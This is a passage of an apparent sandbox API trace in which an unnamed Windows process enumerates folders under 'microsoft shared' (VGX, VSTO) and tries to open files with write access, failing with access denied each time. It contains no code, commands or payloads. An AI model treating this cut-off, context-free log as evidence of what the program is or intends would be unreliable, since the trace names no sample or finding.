Context=0x0) returned 1 [0103.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0103.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a5c8 [0103.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0103.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0103.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0103.650] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0103.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0103.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0103.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0103.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0103.650] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78490 [0103.650] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b59a78, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.650] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a69a2a7, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xb3fd6e56, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x4a69a2a7, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0xf1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX.dll", cAlternateFileName="")) returned 1 [0103.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0103.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0103.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0103.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0103.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0103.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0103.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0103.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0103.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0103.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0103.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0103.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0103.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0103.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0103.729] AreFileApisANSI () returned 1 [0103.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll", lpUsedDefaultChar=0x0) returned 59 [0103.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0103.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0103.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0103.730] AreFileApisANSI () returned 1 [0103.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0103.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0103.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 59 [0103.730] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.731] GetFileType (hFile=0x27c) returned 0x1 [0103.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0103.731] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0103.731] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0103.731] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0103.731] CloseHandle (hObject=0x27c) returned 1 [0103.732] AreFileApisANSI () returned 1 [0103.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0103.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69e30 [0103.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll") returned 59 [0103.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.732] GetLastError () returned 0x5 [0103.732] GetLastError () returned 0x5 [0103.732] SetLastError (dwErrCode=0x5) [0103.732] GetLastError () returned 0x5 [0103.732] SetLastError (dwErrCode=0x5) [0103.732] GetLastError () returned 0x5 [0103.732] SetLastError (dwErrCode=0x5) [0103.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0103.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0103.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0103.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.732] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x74, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6e610, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x74, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧က\x0f⺊Ā")) returned 0 [0103.732] FindClose (in: hFindFile=0x78490 | out: hFindFile=0x78490) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0103.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0103.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0103.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0103.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0103.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0103.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0103.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0103.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0103.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0103.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0103.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0103.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0103.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ac50 [0103.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0103.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0103.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0103.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0103.734] AreFileApisANSI () returned 1 [0103.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO", lpUsedDefaultChar=0x0) returned 52 [0103.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0103.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0103.734] AreFileApisANSI () returned 1 [0103.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0103.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0103.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46048, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO") returned 52 [0103.734] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.734] GetLastError () returned 0x5 [0103.734] GetLastError () returned 0x5 [0103.734] SetLastError (dwErrCode=0x5) [0103.734] GetLastError () returned 0x5 [0103.734] SetLastError (dwErrCode=0x5) [0103.734] GetLastError () returned 0x5 [0103.734] SetLastError (dwErrCode=0x5) [0103.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0103.735] AreFileApisANSI () returned 1 [0103.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0103.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0103.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO") returned 52 [0103.735] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.735] GetLastError () returned 0x5 [0103.735] GetLastError () returned 0x5 [0103.735] SetLastError (dwErrCode=0x5) [0103.735] GetLastError () returned 0x5 [0103.735] SetLastError (dwErrCode=0x5) [0103.735] GetLastError () returned 0x5 [0103.735] SetLastError (dwErrCode=0x5) [0103.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0103.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0103.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0103.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0103.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8abb8 [0103.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0103.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0103.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0103.735] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x66, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x75ec0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x66, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="")) returned 0 [0103.735] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0103.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0103.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0103.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0103.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0103.736] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78150 [0103.736] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.736] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6d7a0a, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4aebd53e, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4aebd53e, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0103.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0103.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0103.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0103.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0103.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0103.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0103.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0103.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0103.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0103.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0103.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0103.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0103.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0103.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0103.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0103.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0103.737] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.737] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.737] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.737] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0103.737] AreFileApisANSI () returned 1 [0103.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0", lpUsedDefaultChar=0x0) returned 57 [0103.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0103.737] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.737] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0103.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0103.737] AreFileApisANSI () returned 1 [0103.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0103.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0103.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0") returned 57 [0103.737] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff 